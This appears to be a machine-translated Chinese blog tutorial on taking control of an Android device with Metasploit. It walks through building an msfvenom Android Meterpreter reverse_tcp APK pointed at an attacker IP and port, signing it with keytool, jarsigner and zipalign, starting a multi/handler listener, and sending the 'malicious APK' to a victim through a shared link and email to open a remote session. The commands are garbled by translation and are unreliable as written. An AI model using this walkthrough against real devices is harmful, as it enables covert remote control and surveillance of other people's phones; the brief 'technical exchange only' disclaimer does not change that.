最后更新:2020-04-11 11:57:41 手机定位技术交流文章
这篇文章的内容可能在某种程度上令人不快。这篇文章仅用于技术交流。任何非法使用都将自担风险。
在这个实验中,我将使用kali linux和Android模拟器来演示如何使用Metasploit框架来控制Android设备。
创建负载
我们需要两个虚拟机:卡利Linux和安卓模拟器。

打开虚拟机并启动Kali linux。然后打开终端,使用MSF毒液制作安卓应用程序。
MSF蛇毒是msfpayload和msfencode的组合。这是一个单一的工具。它有标准的命令行选项。Msfvenom制造的有效载荷用于穿透安卓模拟器。
在打开终端提示符下输入以下命令后,使用msf毒液工具创建有效载荷APK文件。
msfvene-p Android/meter preter/reverse _ TCP LHOST = 192 . 168 . 1128 LPORT = 4444 R & gt。/根/桌面/五旬节
p设置要使用的有效负载。
左后设置用于接收反弹连接的主机
设置用于接收反弹连接的端口
设置文件格式
要保存的位置文件位置
在这个命令被执行后,你会看到一些错误,但是不要担心。生成的apk现在可以在输出目录中查看。

我们已经成功地创建了安卓格式(APK)文件的有效载荷。目前,没有适当的签名证书,一般的安卓移动设备不允许安装应用程序。安卓设备只安装带有签名文件的APK。
我们可以使用以下工具手动签名:
l键工具(已安装)
L jar签名者(已安装)
L zipalign(需要安装)
执行以下命令签名。首先使用密钥工具创建密钥库。
key tool-gen key-v-keystore my-release-key。密钥库-别名-名称-密钥组-密钥大小204有效性10000 '

然后用签名人签下APK
JARsigner-verbose-sigalgsha 1 with RSA-digitalgsha keystore my-release-key . keystore appname . apkalias name `用JARsigner验证签名
jarsigner-verify-verbose-certs APPNAME . apk ` a

Kali没有预装Zipling,需要先安装Zipling。然后使用zipalign验证apk。
zip align-v 4 APPNAME . apk NEWAPPNAME . apk
现在我们有一个签名APK,可以安装在任何设备上。

使用Metasploit进行测试
接下来,启动metasploit的侦听器。执行msfconsole打开控制台。

使用漏洞/多/处理器设置有效负载安卓/仪表预测器/反向_tcp设置左后192.168.152.128设置左后4444漏洞

是时候将恶意的APK发送到手机上了。我们使用网络磁盘上传我们的APK,并共享下载链接。

这是我们切换到安卓模拟器。
1.从https://code.google.com/archive/p/android-x86/downloads. 2下载安卓x86的iso。使用vmware创建内核版本为2.6的虚拟机。3.装载镜像并启动虚拟机。4.进入实时模式。5.设置你的手机并登录谷歌账户。点击安卓模拟器中的链接并下载。我们已经向受害者的谷歌账户发送了一封电子邮件。

此外,安卓应该被允许安装来历不明的apk。


回到卡利,我们发现已经创建了一个新的会话。

然后你可以随心所欲地操作“手机”。

本文由 在线网速测试 整理编辑,转载请注明出处。